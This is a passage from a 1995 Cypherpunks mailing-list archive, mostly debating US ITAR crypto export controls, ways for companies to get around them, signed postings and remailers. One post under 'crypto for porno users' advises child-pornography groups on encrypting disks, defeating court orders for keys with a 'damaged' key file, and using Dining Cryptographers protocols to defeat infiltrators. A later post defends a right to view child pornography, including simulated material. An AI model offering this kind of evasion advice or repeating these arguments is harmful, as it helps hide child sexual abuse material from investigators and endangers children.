trying to find some way to make money.

> I very much agree with the direction you appear to be headed in.
It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.

But why would they want to risk this? As squeaky clean as it is, we now
all know that they know that making it available this way is exporting
it. It's also possible that one of the people who took part in it would
turn State's evidence, or that this would result in a loss of
shareholder confidence, or that the people running Netscape support the
government position, or even that they just don't want the controversy.

> In addition, why should they even need to write the encryption part of their
> software IN the US? It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC, Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto." He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.

This is illegal as well. The programmer is exporting the cryptosystem,
and may even be guilty of treason (probably not).

If you really want strong crypto, just buy it from one of the hundreds of
legitimate overseas suppliers. If you want to export strong crypto
Netscape, rewrite Netscape outside the US. It's not that complex a
program.

--
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From asgaard at sos.sll.se Thu Nov 23 19:16:11 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 24 Nov 1995 11:16:11 +0800
Subject: The Mesh and the Net
In-Reply-To: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
Message-ID:

On Wed, 22 Nov 1995, John Young wrote:

> "The Mesh and the Net: Speculations on Armed Conflict in a
> Time of Free Silicon," by Martin C. Libicki, March, 1994.
> (233kb)
>
> Available on the Web at:
>
>
>
> NDU is the National Defense University, Libicki's teat.

A very interesting read! The speculations about the future of the
(civilian) Net are amazing, even more so coming from an official
sub-division of the US DoD (?). An excerpt (that could have been
written by a cypherpunk crypto-anarchist philosopher just as well):

'The information revolution, acting through multinational corporations
and transnational communities, may weaken many powers of the state
anyway. Would it be much of an exaggeration to posit a nation's
expression, not through government, but as a local ganglion of the
world Net. That being the case, might not the decline of the state
coincide with the rise of the Net, the newest venue for crime,
conflict, and chaos?'

Mats

From asgaard at sos.sll.se Thu Nov 23 19:30:11 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 24 Nov 1995 11:30:11 +0800
Subject: GOST for sale
Message-ID:

According to a short article in a Swedish newspaper (DN) with the
title 'Spy Code of KGB can make computers safe', JETICO INC., located
in Finland (Tammerfors), introduced a new crypto system on the world
market last week. It's based on GOST, the Russian federal standard
algorithm. This product, called BestCrypt, is implemented at least
partly in hardware. Allegedly it uses 'GOST 28147-89', whatever that
stands for.

GOST is probably very secure - a huge keyspace (256 bits) and KGB
would not have left a trapdoor for NSA to take advantage of, would
they?

The newspaper article ends: 'The Finnish entrepreneurs asseverate
that their Russian colleagues have never had anything to do with the
KGB.'

Mats

From markm at omni.voicenet.com Thu Nov 23 20:26:07 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Fri, 24 Nov 1995 12:26:07 +0800
Subject: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 23 Nov 1995, Laurent Demailly wrote:

> sameer at c2.org writes:
> [ 'passwd'/'secret' is NEWDIRNAME : ]
> > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
> [...]
> Hey hey, cool, what a great security ! now can you please send source
> for /usr/local/bin/pseudo-random ? :-)))
>

I just used the following simple shell script. Not very secure but does the
trick for the purposes of export controlled directories.

#!/bin/sh
(date; uptime; ps -e; netstat; set) | md5sum

- --
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLVFB7Zc+sv5siulAQFH8gQAia001FgQfLTK7B97vB7KMH/eAb2RWG/a
MjO3x8Mp1FkHnyI5/hKvvxP2MEn8O69XPMIqKqn/dcflok807qJ9mnNh0MciHTMm
H5qStR3S36zFQyxLjrOcLN/9EzudsRIWndIX+/FFyBV7cNCSfUqHTYJGuqVzXbvC
IheIJzuxCu4=
=tXU6
-----END PGP SIGNATURE-----

`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47 20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/

From cme at clark.net Thu Nov 23 21:28:39 1995
From: cme at clark.net (Carl Ellison)
Date: Fri, 24 Nov 1995 13:28:39 +0800
Subject: establishing trust
Message-ID: <199511240500.AAA07836@clark.net>

>From khijol!erc at uunet.uu.net Thu Nov 23 16:21 EST 1995
>From: "Ed Carp [khijol SysAdmin]"

..so..why the UUCP style address?

>Subject: Re: crypto for porno users
>To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison)
>Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
>Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.net
>
>totally different from this "web of trust" I keep hearing about - and that is
>*it*. Do you trust me any more now than before I started signing my postings?

Actually, in my view, signed postings are the first step.
With those (and the right S/W (not there yet)), I get to know that a bunch of postings came from the same person. I even know who they came from: the person who is capable of signing with key 0xXXXXXXXX. Since the only way I have of getting to know the person is through those postings, I get to know that person and through that knowledge I decide whether or not to trust. And, yes, I can be fooled. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From merriman at arn.net Thu Nov 23 23:42:49 1995 From: merriman at arn.net (David K. Merriman) Date: Fri, 24 Nov 1995 15:42:49 +0800 Subject: bit quiet in here lately Message-ID: <199511240728.BAA11266@arnet.arn.net> At 02:11 AM 11/24/95 -0500, futplex wrote: >sameer writes: >> I am working on a spec which myself and others will turn into >> an internet draft, for placements on the standards track. It will >> standardize remailer commands and nymserver commands, and will >> incorporate payment. Once we get a draft written up it will be posted >> for review, flames, and criticism. > >Great -- I've been toying with working on exactly that since the summer. >I never quite convinced myself that a) the general net community would really >take a remailer-related i-draft or RFC seriously, or even that b) the >remailer community would really find a standards document useful. It's >encouraging to see that some other people also think it's worth writing. 
> Now, if the remailer service-listing operators could agree on a standard format for their reporting (lag time, feature lists, etc), then it would simplify maintaining a list of remailers - which would increase the usability of the remailer system, and help the use and growth of remailers. Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> My web page: http://www.geopages.com/CapitolHill/1148 From aba at atlas.ex.ac.uk Fri Nov 24 02:02:04 1995 From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk) Date: Fri, 24 Nov 1995 18:02:04 +0800 Subject: real life problems with ITAR (was Spam the Sign!) Message-ID: <604.9511240945@exe.dcs.exeter.ac.uk> Attila writes: > On Thu, 23 Nov 1995, jim bell wrote: > > > [US companies hiring non-US programmers to avoid ITAR] > > I think they have that one covered --not only is it > violation of ITAR's intent to send a programmer out of the U.S., but is > illegal to hire a foreign national to program for your non-U.S. products. Having your company legally based outside the US, with just a US office (on paper) would seem to get around this. If all your code is shipped from Sun Corp, Russia (and actually you get CDs in the mail from Russia literally if you order software from them), then it would seem to avoid the problem. 
They'd probably have to make sure that no programming at all occurred in
the US otherwise they'd be susceptible to the claim that they were
violating ITAR by their US development team exporting software with a
hole for crypto to their main development team in Russia.
Multinationals could juggle that much easily.

The other problem is that multi-nationals don't like stepping on the
govt's toes, because the govt might retaliate by not buying Sun, or Sun
mysteriously losing contracts. Sound right?

> the test is going to be with someone like Sun who "bought" a group of
> Russian crypto programmers and left them in Russia. Now, the problem
> with ITAR is that if you import that code, you can not then export the
> code since it is now covered by ITAR.

However this is the real problem, they don't want crypto no matter what.
They'll do their damnedest to stop it by whatever means: legal or
illegal, monetary pressure, threats, FUD, overbroad ITAR, selective
enforcement, etc.

> secondly, it appears there is a move afoot to make it an ITAR
> violation to hire the foreign nationals to circumvent ITAR --basically,
> the Feds want to stop cryptography _everywhere_, including telling
> Russians they can not work for U.S. companies! Just where do they think
> they are getting off?
>
> then, when ALL hitech moves out of the U.S. and the DoD needs us, we
> will not be here, will we?

Something that is puzzling me is how DigiCash is doing. Their software
I think is ITAR regulated (or would be if it were shipped from a US ftp
site). OK, so they get around it by shipping their software from
Digicash, Bv, Netherlands. But, somewhere on their pages it mentions
that: "Digicash, Bv is a wholly owned subsidiary of Digicash" (which
*is* based in the US).

Does that make them a counter example who is currently getting away
with it?

Just to complicate things further David Chaum is a US citizen, right?
Maybe he himself is ok because he doesn't write the code himself, the
digicash development team does.
Is Digicash (US) hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary, in US legal terms? Reckon the long term message is for companies to just pull out of the US. Moving to a suitable jurisdiction would be possible for Netscape, and would be a coool blow against ITAR. Adam From jamesd at echeque.com Fri Nov 24 02:17:51 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 24 Nov 1995 18:17:51 +0800 Subject: crypto for porno users Message-ID: <199511240423.UAA25472@blob.best.net> At 12:17 AM 11/23/95 -0800, Jay Campbell wrote: > A common way to get around prostitution sting operations > is to ask the lady to expose sensitive portions of her anatomy > to prove her sincerity before the would-be customer commits > to any transactions; this sort of thing is also becoming > commonplace on the net for pornography or pirated software, This protects the customer against stings, but it does not protect the supplier against stings. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From gjeffers at socketis.net Fri Nov 24 02:18:25 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Fri, 24 Nov 1995 18:18:25 +0800 Subject: crypto for porno users Message-ID: <199511241535.JAA30731@mail.socketis.net> crypto for porno users Crypto porno is a wonderful topic for Cypherpunks. Child porno people are a group that definitely needs the very best in computer security. If their computer security problems are solved, then everybodys' computer security problems are solved. COMPUTER SITE DISK SECURITY The SecureDrive 1.4 disk encryptor system solves their computer site disk storage problem. It also gives them the solution to the "rubber hose" problem. 
With a "damaged" key file and the use of a password, they have an effective defense against court orders demanding keys. (see the docs for SecureDrive 1.4). Also disk encryptors not only encrypt files but also solve the problem of temporary work files that are used by many software packages (They can be reconstructed). TELECOMMUNICATIONS SECURITY MIT's PGP 2.6.2 solves their problem of secure telecommunications. This assumes that the people involved can really trust each other. STATE INFILTRATOR PROBLEM Of course, one of the really big problems for non-STATE approved groups is the problem of state agents infiltrating the group. This gets worse as the group gets bigger. This is also one more thing I have against states - one of their jobs is having their agents make friends with cit- izens and then betray their friends. Has anyone else noticed? - THE STATE HAS NO HONOR! The state prides itself on its cleverness here. Also, of course, once the state has entrapped an individual, they tend to get other members of the group by having their victims get and give evidence against other members. - sort of a domino effect and the group unravels - especially with the conspiracy laws. Drug distribution gangs are famous for falling to these techniques. A possibly unbreakable defense against the above assault would be the use of a Dining Cryptographers protocol. According to Applied Crypto- graphy, PGP may be used to send messages in these protocols. Pretend that a small group of Cypherpunks are child porn enthusiasts and decide to use the Cypherpunk mailing list to exchange pictures and child porn info.. I know little of the theory of Dining Cryptographers but I would think that a good implementation of it would make infiltrators useless. I will leave it for other Cypherpunks to discuss the mechanics (specific and general) for actually doing this. 
A possible risk would be that this would put the general membership of Cypherpunks at risk - or would it just put the list itself to risk? Does this imply that we need FORTRESS mailing lists or what others would des- cribe as COERCION-FREE mailing lists? Would remailers that allow two way secure communication be a help here? Would they be forced to be FORTRESS or COERCION-FREE to be effective? Should they use expendable lists?:-) Generally, if you wanted to start a discussion group on a forbidden topic on the Internet, and wanted to keep it secure - how would you do it? Today this is an academic question - but tomorrow? :-) Aside from workable anonymous Internet money, the two most needed computer privacy technologies are fortress mailing lists and remailers and workable Dining Cryptographers protocols. THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY. The United States "Federal" Government - We'll be even more American without it. PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCCK! BBBEEEAAATTTT STATE! Gary Jeffers  From jcobb at ahcbsd1.ovnet.com Fri Nov 24 02:18:54 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Fri, 24 Nov 1995 18:18:54 +0800 Subject: Junk E-Mail - Part 4 Message-ID: Friend, In its NEWS IN BRIEF summary, 11 22 95 Financial Times reports: BRUSSELS/LONDON - SELLING - A ban on telephone "cold calling" throughout the European Union was on Tuesday approved by Euro-MPs, to the consternation of direct mar- keting and distance selling organisations. In a move de- signed to spare people from what MEPs consider to be ir- ritating telephone calls, a key parliamentary committee voted to make prior consent from consumers obligatory before a seller can approach them by telephone. The proposed ban also applies to communications by e- mail, raising fears among publishing organisations that the development of the information society in Europe could be damaged. Ban fear, for we have nothing to fear but fear itself. Cordially, Jim NOTE. 
The URL of one Financial Times Group website is: http://www.usa.ft.com From jamesd at echeque.com Fri Nov 24 02:19:05 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 24 Nov 1995 18:19:05 +0800 Subject: Spam the Sign! Message-ID: <199511240423.UAA25467@blob.best.net> At 04:02 PM 11/22/95 -0800, Jeff Simmons wrote: > and yet the people with the [balls] > to actually challenge it aren't the big companies who stand to gain the > most financially, it's a bunch of guys (a lot of whom hang around here > sometimes) who are successfully giving away 'export controlled' software, If you have looked at court cases recently, you will notice that most juries will find a corporation guilty of anything, no matter how absurd. At a gut level they feel that the pursuit of profit is itself a crime, and that the pursuit of profit in an organized group is a flagrant and terrible crime, deserving of the most savage punishment, unless that pursuit has been thoroughly and carefully supervised and authorized by the state. They are much more reluctant to punish an individual, which is why the government wants to keep Phil in permanent legal limbo. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From EALLENSMITH at mbcl.rutgers.edu Fri Nov 24 18:56:59 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Fri, 24 Nov 95 18:56:59 PST Subject: crypto for porno users Message-ID: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu> From: IN%"moroni at scranton.com" "Moroni" 24-NOV-1995 14:52:11.13 >I wish we could get off the subject of the kiddie porn , it makes >me wonder what people on this list are doing when they are not >mailing out letters. 
Not to flame ,BUT it is such a serious issue >and we all as adults and approaching adults should not treat it as >an academic issue . It is the most victimizing of all crimes and >I think of speak for some of us when I say that it would be better >if we all found a way to get back to discussing the problems of >cryptography as related to we not pornographers. I can see one argument that one should not discuss such unpopular topics. That argument is that the person who brought them up may act as a (hopefully inadvertent) _agent provocateur_ for those who would condemn cryptography for protecting child pornography and similarly unaccepted practices. However, I regard self-censorship in reaction to fears of government as as evil as governmental censorship. Consequently, I would like to give two counterarguments to the idea that child pornography is not something that should be cryptographically protected. The first is that one may legitimately disagree with the government on what is child pornography. For instance, one may disagree on what minimum age should be used. Governments are known for being quite incoherent on rules on sexuality and the age of consent. For instance, Britain's age for consent depends on the type of sexuality involved; heterosexual sex receives a more lenient age (18) than homosexual (21). (There are also, of course, difficulties caused by such legal inconsistencies as simultaneously deeming someone not to be of consenting age for sex yet to be considered an adult when charged with murder; I refer to the infamous Bobbit (sp?) trials). The second is that given new image modification technologies, it is possible to produce what will seem child pornography, but with no actual harm done to children. In some ways, this product may reduce harm to children in some respects by providing a "competing product" to actual child pornography, and thus discourage its manufacture. 
Some will argue that such simulated child pornography is useful by pedophiles in persuading children; this argument appears similar to the one against cryptography that it can be used for purposes generally agreed to be illegitimate. I trust that the list does not find such an argument to be valid. I will mention in this regard that I have no personal want to see child pornography. However, I support the right of those who do to do so, if no harm to others is committed. Sincerely Yours, -Allen From s1113645 at tesla.cc.uottawa.ca Fri Nov 24 07:58:32 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Fri, 24 Nov 1995 23:58:32 +0800 Subject: Spam the Sign! In-Reply-To: Message-ID: On Thu, 23 Nov 1995, jim bell wrote: > deal of fanfare, and tell him to "write some crypto." He does, and brings > it back into the US with him, leaving a copy of it "outside" the country for > international distribution. As long as the programmer's not American. They could contract it to a Canadian though. We don't have freeware export restrictions on non-US crypto, but I'm none too clear about everything else. All the same why not contract it to Eric Young or whoever it is who's doing an independent version of SSL (or whatever it's called) Down Under (was it Australia or NZ?) ? I don't see why geography's a problem. From attila at primenet.com Fri Nov 24 07:59:44 1995 From: attila at primenet.com (attila) Date: Fri, 24 Nov 1995 23:59:44 +0800 Subject: "lack" of export control rules In-Reply-To: <199511240523.VAA03642@infinity.c2.org> Message-ID: On Thu, 23 Nov 1995, sameer wrote: a> The feds have never established a general policy. a> in other words, business as usual with the Feds. 
If there is no "book" on what is or is not legal v/v ITAR, and the
agency responsible will not communicate, it empirically says:

"...well, be reasonable to meet the intent of the law, but we will
not tell you what is really expected; however, if, in the future, we
decide what we really want, we will bust you if you did not fully
comply despite your good intentions --and, if that does not fly,
we'll charge you with conspiracy...."

having been down the road a couple times including being charged with
technology export for things which are essentially combinations of
common knowledge, if nothing else works for the Feds, conspiracy will
--and it carries the same penalties as the "crime" itself.

No small wonder the Europeans, including the British, laugh at our
"legal" system.

a> > if a solid (or reasonably accurate given the feds refusal
a> > to put anything in writing) FAQ can be assembled, it would be worth
a> > posting as a resource.
a> >
a> > I had thought the feds were requiring that you at least verify the
a> > address of the party requesting the code --at least as far as screening
a> > out the obvious ones like .uk or .de and the like --which is far from
a> > foolproof. There has been mention someplace that they also expect some
a> > screening by verifying numbers, not just names.
a> >
a> > I guess the real question, just how much checking do they expect?
a> > checking for country domains is easy enough, and the 'foolers' in
a> > .edu group can be listed, but there are plenty of other deceptions
a> > if you control the machine since communication inevitably works by
a> > the numbers which is a whole new ball of wax.
a> >
a> > On Tue, 21 Nov 1995, sameer wrote:
a> >
a> > > #!/bin/sh
a> > > umask 022
a> > > DIRNAME=`cat $HOME/.usonlydir`
a> > > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
a> > > cd /u1/ftp/pub/US-only
a> > > mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
a> > > cd ..
a> > > sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
a> > > mv README.new README.US-only
a> > > echo $NEWDIRNAME > $HOME/.usonlydir
a> >

From attila at primenet.com Fri Nov 24 07:59:56 1995
From: attila at primenet.com (attila)
Date: Fri, 24 Nov 1995 23:59:56 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To:
Message-ID:

On Thu, 23 Nov 1995, jim bell wrote:

> Jeff Simmons said...
> [SNIP]
> >
> >I have the feeling that we're talking about two different things here - the
> >law as it's practiced in the courtroom and the law as it's practiced on the
> >'streets'. Obviously, the fact that I feel I'm doing something 'legal'
> >won't help much if the government decides to do a Phil Zimmerman on me.
> >But I would be interested in your comments.
>
On Thu, 23 Nov 1995, jim bell wrote:

> I very much agree with the direction you appear to be headed in. It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.
>
>
> In addition, why should they even need to write the encryption part of their
> software IN the US? It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC, Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto." He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
>

I think they have that one covered --not only is it
violation of ITAR's intent to send a programmer out of the U.S., but is
illegal to hire a foreign national to program for your non-U.S. products.

the test is going to be with someone like Sun who "bought" a group of
Russian crypto programmers and left them in Russia.
Now, the problem
with ITAR is that if you import that code, you can not then export the
code since it is now covered by ITAR.

secondly, it appears there is a move afoot to make it an ITAR
violation to hire the foreign nationals to circumvent ITAR --basically,
the Feds want to stop cryptography _everywhere_, including telling
Russians they can not work for U.S. companies! Just where do they think
they are getting off?

then, when ALL hitech moves out of the U.S. and the DoD needs us, we
will not be here, will we?

From khijol!erc at uunet.uu.net Fri Nov 24 08:02:42 1995
From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin])
Date: Sat, 25 Nov 1995 00:02:42 +0800
Subject: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <199511240708.BAA22051@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

> >From khijol!erc at uunet.uu.net Thu Nov 23 16:21 EST 1995
> >From: "Ed Carp [khijol SysAdmin]"
>
> ..so..why the UUCP style address?

Because I don't have a real UUCP connection at the moment. Khijol is
expected to get back on the net as khijol.org in the next few days. Just
trying to get by until then :)

> >Subject: Re: crypto for porno users
> >To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison)
> >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
> >Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.net
> >
>
> >totally different from this "web of trust" I keep hearing about - and that is
> >*it*. Do you trust me any more now than before I started signing my postings?
>
> Actually, in my view, signed postings are the first step. With those (and
> the right S/W (not there yet)), I get to know that a bunch of postings came
> from the same person. I even know who they came from: the person who
> is capable of signing with key 0xXXXXXXXX.

Yes, but that only establishes that I was the one who wrote the post, not
that I am to be trusted...
> Since the only way I have of getting to know the person is through those
> postings, I get to know that person and through that knowledge I decide
> whether or not to trust.
>
> And, yes, I can be fooled.

I've met a fair number of people in person that I've met over the net, and I'm here to tell you that a lot of people I've met are totally different in person than they are over the net. People that I thought I could trust gave me the willies in person, and I eventually found out that I couldn't trust them at all.

Get burned a couple of times like that, and you learn to suspend trust until you really meet someone in person.

Just my $0.02.

- --
Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLVvXCS9AwzY9LDxAQFO+wP+KYeRi9K/9AgXA7iyha61lsjZpYkDoSD1
kGaH04GGKcBhxPbVeRDnKaqM8oxesi24aKBWC7Hc0mJhB1+fsjZpwghd5/CzYAiK
WcZULWnVLKIqXWJlQuV/1UsEgHVa0mCEFbIUVoJtILQXoSRGIO7ga+6poYy5ag/r
g4Kgbf4M8GM=
=+Ee3
-----END PGP SIGNATURE-----

From jimbell at pacifier.com Fri Nov 24 08:02:45 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 00:02:45 +0800
Subject: Spam the Sign!
Message-ID:

>> Jeff Simmons said...
>>
>> >Then suppose you hand software to MIT to put on its export-controlled ftp
>> >site (which would seem to follow your requirements to take reasonable
>> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>> >wink, wink - BUT you know that it's going to be available on major ftp
>> >sites in Europe within a few hours anyway. The intent to export isn't
>> >there, but the export occurs anyway. Is it the intent, or the knowledge
>> >that's important?
>
>What's important to the government is that the crypto not be exported.
Actually, that's not true. What's REALLY important to the government is that it not be AVAILABLE outside the country, or perhaps even more accurately, not available anywhere. Problem is, the government doesn't have unlimited authority in this area.

>> >Or, to bring it down to a practical question, what's stopping Netscape? How
>> >does Netscape setting up an 'export controlled' ftp site based on the MIT
>> >version lead to one of their executives going to jail?
>
>Maybe their executives don't want to deal with the possibility of going to
>jail and are staying far from the edge of the law. Maybe they are too busy
>trying to find some way to make money.
>
>> I very much agree with the direction you appear to be headed in. It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.
>
>But why would they want to risk this? As squeaky clean as it is, we now
>all know that they know that making it available this way is exporting
>it.

NO! The government doesn't even pretend to have authority over non-exported encryption, and they readily admit this. And I'm sure they are also aware that they can't press their luck with an overbroad interpretation of ITAR.

Let's look at REALITY, okay? Export controls on products have been around for many decades. Computers are a classic example. If merely manufacturing a product that (if exported to the wrong place) becomes a violation of such laws/regulations, then practically every computer company that has ever existed violated ITAR.

Here's the real "problem": Export regulations were intended to MINIMIZE the number of controlled products "leaking through" the border. There was never any illusion that this could be entirely eliminated. So far so good: They were happy to minimize the number of mainframe computers 1970 (for example) USSR got.
Software, by its very nature, is infinitely copiable, which means that even a single export constitutes a complete failure of the system. Thus, a system of regulation that was useful for hardware becomes totally useless for software.

>> In addition, why should they even need to write the encryption part of their
>> software IN the US? It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto." He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>
>This is illegal as well.

No, it isn't.

>The programmer is exporting the cryptosystem,

No, he isn't. Exporting a book on encryption, including algorithms, for example, is entirely LEGAL. And I think you're misusing the term, "cryptosystem." The government may be attempting to use ITAR to regulate exports of fully-functioning software, but it apparently cannot touch books containing source code for such programming. Thus, "exporting the cryptosystem" is NOT always a violation of ITAR if your definition of "cryptosystem" is so broad as to include source-on-paper, and thus your statement is legally irrelevant. If you tighten up the term "cryptosystem" to include only functioning software, your statement becomes false because said programmer does not need to export same.

Note that I'm assuming that the programmer GENUINELY writes the software abroad, as opposed to faking it. Of course, even "faking it" might be legal: If source-on-paper exporting is LEGAL, then taking a copy of an encryption program outside the country on paper, then scanning it into a computer and recompiling there should also be legal.

>and may even be guilty of treason (probably not).
If you really want
>strong crypto, just buy it from one of the hundreds of legitimate
>overseas suppliers. If you want to export strong crypto Netscape,
>rewrite Netscape outside the US. It's not that complex a program.

That's not a satisfactory solution. The goal, I suggest, is to allow Netscape (or any other manufacturer) to sell a SINGLE product around the world, without violating (even arguably) ITAR.

From jya at pipeline.com Fri Nov 24 08:14:46 1995
From: jya at pipeline.com (John Young)
Date: Sat, 25 Nov 1995 00:14:46 +0800
Subject: CJR_war
Message-ID: <199511241605.LAA19328@pipe3.nyc.pipeline.com>

SciAm, December, 1995: "Fighting Future Wars. U.S. military planners may be preparing for the wrong conflict."

Policy experts, technical gurus and defense contractors have begun to study a range of other potential threats, from a newly hatched superpower to a regional power with dramatically altered fighting tactics, to legions of mercenary hackers that bring down banks and stock exchanges with computer viruses and other malevolent software. The vast array of scenarios is a measure of the speculative turn that has gripped the military-planning establishment.

Debate on high-tech fighting culminates in the question of whether information technologies -- a computer virus, for one -- could make conventional military hardware obsolete and whether they would make possible a virtual invasion of the continental U.S. A battle of the bits would be fought by destroying an enemy's information assets, its financial, electrical, telecommunications and air-traffic-control networks. Direct strikes at the military would not be ruled out: cracking a government computer is already a not infrequent hacker rite of passage. In addition, more than 95 percent of military communications travel over public networks.
CJR_war

From jya at pipeline.com Fri Nov 24 08:16:45 1995
From: jya at pipeline.com (John Young)
Date: Sat, 25 Nov 1995 00:16:45 +0800
Subject: SEL_ane
Message-ID: <199511241607.LAA19557@pipe3.nyc.pipeline.com>

As previously noted here:

SciAm, December, 1995: "Confidential Communication on the Internet." By Thomas Beth, director of the European Institute for System Security and professor of computer science at the University of Karlsruhe.

Chain of certification in the author's scheme, SELANE, extends from local authorities who vouch for an individual's identity and probity up through regional, national and supranational authorities, each vouching for those below it. Digital signatures prevent tampering; anyone who recognizes one signature in the chain can be assured that a signed document is valid.

SELANE is compatible with almost every commercial and academic network. It also provides a "smart" card that can carry out the necessary calculations securely for each user. And it addresses the conflicts of government and privacy interests when wire-tapping is needed.

SEL_ane

From saken at chardos.connix.com Fri Nov 24 09:05:38 1995
From: saken at chardos.connix.com (Scott Kenney)
Date: Sat, 25 Nov 1995 01:05:38 +0800
Subject: ANNOUNCE - Amnesia Remailer now public
Message-ID: <199511241656.LAA05960@chardos.connix.com>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From jimbell at pacifier.com Fri Nov 24 09:41:00 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 01:41:00 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
Message-ID:

Attila at primenet.com said:

> On Thu, 23 Nov 1995, jim bell wrote:
>
>> I very much agree with the direction you appear to be headed in. It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.
>>
>>
>> In addition, why should they even need to write the encryption part of their
>> software IN the US? It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto." He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>>
> I think they have that one covered --not only is it
>violation of ITAR's intent to send a programmer out of the U.S.

Well, don't assume that because something's a "violation of ITAR's INTENT" it is actually a violation of ITAR. It can't be assumed that ITAR is _perfect_: That it actually prohibits every activity the government that wrote it didn't like.

, but is
>illegal to hire a foreign national to program for your non-U.S. products.

Sure about this?!?

> the test is going to be with someone like Sun who "bought" a group of
>Russian crypto programmers and left them in Russia. Now, the problem
